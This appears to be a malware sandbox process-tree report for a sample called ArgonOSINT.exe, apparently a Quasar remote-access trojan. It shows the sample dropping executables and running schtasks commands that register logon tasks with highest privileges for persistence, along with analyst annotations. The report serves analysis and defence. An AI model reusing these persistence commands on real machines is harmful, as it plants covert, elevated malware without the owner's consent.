c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe -k localservice -s netprofm
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
C:\Windows\System32\spoolsv.exe  [PID 1960]
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
C:\Windows\sysmon.exe  [PID 2480]
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe -k netsvcs -s Browser
C:\Windows\system32\wbem\unsecapp.exe -Embedding  [PID 3012]
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE  [PID 3416]
    flags: Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow
    "C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe"  [PID 4596]  (the submitted sample)
        flags: Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe" /rl HIGHEST /f  (image: C:\Windows\SysWOW64\schtasks.exe)  [PID 3704]
            flags: Creates scheduled task(s)
        "C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe"  [PID 2000]
            flags: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
            "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe" /rl HIGHEST /f  (image: C:\Windows\SysWOW64\schtasks.exe)  [PID 3056]
                flags: Creates scheduled task(s)
        "C:\Users\Admin\AppData\Local\Temp\install.exe"  [PID 3400]
            flags: Executes dropped EXE
        "SCHTASKS.exe" /create /tn "$77ArgonOSINT.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe'" /sc onlogon /rl HIGHEST  (image: C:\Windows\SysWOW64\SCHTASKS.exe)  [PID 4980]
            flags: Creates scheduled task(s)
        (the SysWOW64 schtasks image shows the sample is a 32-bit process; the "$sxr-powershell" task is first registered against the Temp path and then overwritten with /f to point at the Roaming copy, which is the Quasar install path from the config)
    "C:\Windows\system32\taskmgr.exe" /7
C:\Windows\System32\RuntimeBroker.exe -Embedding  [PID 3980]
    flags: Drops file in Windows directory; Checks SCSI registry key(s); Modifies registry class; Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}  [PID 4476]
    flags: Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads